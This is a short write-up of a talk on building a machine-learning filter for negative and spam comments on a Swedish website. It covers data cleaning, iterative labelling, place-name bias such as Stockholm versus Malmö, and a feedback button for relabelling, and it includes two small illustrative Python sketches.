Lessons from building a spam filter

Can you use machine learning to spot angry customers before they leave or start a fire you cannot control? Johan spent some time this summer trying to figure that out, and in this presentation he shares some of the obstacles he ran into along the way.

We all want happy customers, but sometimes they have a bad day, and that might affect you in more ways than you think. You might lose them as a customer, but even worse, they might write about you on social media and tell all their friends about the way you treated them. In this presentation Johan shows some of the issues that came up while he was trying to solve this problem.

To start, you need to define what you want to do. In this case, the goal was to find negative language and spam in comments on the website CityPolarna.se. Then you must find the data and structure it in a way that makes it easy for an algorithm to process. Here that task was quite easy, because all the data could be found in two tables in the database. But there were some issues with strange characters, bad spelling and missing spaces between words.

The next step was to analyse the data to see whether you can manually identify what you are looking for. In this case that was done in cycles, alternating between running the algorithm and looking at the comments it flagged. Many times, incorrectly labelled comments turned out to cause most of the issues, but things like irony and excessive use of numbers and exclamation marks also caused the algorithm to flag a comment as negative.

Splitting the sentences into smaller pieces made it easier to identify specific issues caused by bias. For instance, Stockholm was used more often in negative comments and therefore always pushed the classification of a comment toward a negative score, while Malmö was associated with more positive comments. Bias is one of the more dangerous parts of machine learning, because it can influence the decisions a model makes in ways that are hard to predict. But it is not only the data that can make a model biased. As a developer, I also influence what counts as a negative comment when I manually adjust the labels of comments while analysing the model's output. What I classify as negative might not be considered negative by other people. So we need to be careful as we put more and more trust in these systems.
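The Stockholm and Malmö observation can be checked with a very simple count: for each token, what share of the comments containing it are labelled negative? The sketch below is only an illustration of that idea, not the method used in the talk. The sample comments, the `tokenize` helper and the `negative_rate_per_token` function are all hypothetical.

```python
import re
from collections import Counter

# Hypothetical labelled comments as (text, is_negative); not data from the talk.
comments = [
    ("Stockholm is awful today", True),
    ("Terrible service in Stockholm", True),
    ("Lovely evening in Malmö", False),
    ("Malmö was great", False),
    ("Stockholm was fine", False),
]

def tokenize(text):
    # Lowercase and split on runs of non-word characters.
    return [t for t in re.split(r"\W+", text.lower()) if t]

def negative_rate_per_token(rows):
    # Count, per token, how many comments contain it and how many of those are negative.
    total = Counter()
    negative = Counter()
    for text, is_negative in rows:
        for token in set(tokenize(text)):  # count each token once per comment
            total[token] += 1
            if is_negative:
                negative[token] += 1
    return {token: negative[token] / total[token] for token in total}

rates = negative_rate_per_token(comments)
print(rates["stockholm"], rates["malmö"])
```

A token with a rate far from the overall share of negative comments, such as a city name, is a hint that the model may be learning something about the data set rather than about negative language.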

When the model does what it is supposed to, we can start to integrate it into our solution. At that point it is a good idea to incorporate a feedback mechanism that can produce more labelled data to train the model on in the future. In this case, when a negative comment is reported, it would be a good idea to add a simple button for verifying or correcting the classification of the comment, so that we can use it as a label in the future.
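A minimal sketch of such a feedback mechanism, assuming the button simply tells us whether a reviewer agrees with the prediction. The `FeedbackStore` class and its in-memory list are hypothetical stand-ins for whatever table the real site would use.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class FeedbackStore:
    # In-memory stand-in for a database table of reviewed comments.
    rows: List[Tuple[str, bool]] = field(default_factory=list)

    def record(self, text: str, predicted_negative: bool, reviewer_agrees: bool) -> bool:
        # Keep the prediction if the reviewer confirms it, otherwise flip it.
        label = predicted_negative if reviewer_agrees else not predicted_negative
        self.rows.append((text, label))
        return label

store = FeedbackStore()
store.record("Worst site ever!!!", predicted_negative=True, reviewer_agrees=True)
store.record("This is sick, love it", predicted_negative=True, reviewer_agrees=False)
print(store.rows)
```

The stored pairs can later be added to the training set. Since the reviewer's judgement is itself subjective, the same caution about bias applies to these labels.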

- Johan Broddfelt
Classification, spam filter, RNN

